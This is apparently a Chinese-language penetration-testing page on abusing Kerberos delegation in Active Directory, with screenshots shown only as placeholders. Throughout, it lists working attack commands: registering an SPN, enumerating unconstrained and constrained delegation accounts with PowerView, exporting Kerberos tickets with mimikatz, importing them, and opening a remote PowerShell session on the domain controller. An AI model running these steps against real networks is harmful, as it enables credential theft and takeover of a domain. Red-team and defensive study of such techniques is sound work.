账户委派

设置用户y为服务账户(服务账户有委派权限)
>setspn -U -A variant/golden y
image
查询非受限委派域内账号,使用powerview
>Get-NetUser -Unconstrained -Domain zone.com
image
利用
管理员权限打开mimikatz导出TGT
>privilege::debug
>sekurlsa::tickets /export
image
清空票据,导入票据
image
image
获得Powershell会话
> Enter-PSSession -ComputerName dc.zone.com
image

查询受限委派用户
> Get-DomainUser -TrustedToAuth –Domain zone.com
image
查询受限委派主机
> Get-DomainComputer -TrustedToAuth -Domain zone.com
image
利用方法后见权限维持模块
复制链接
大纲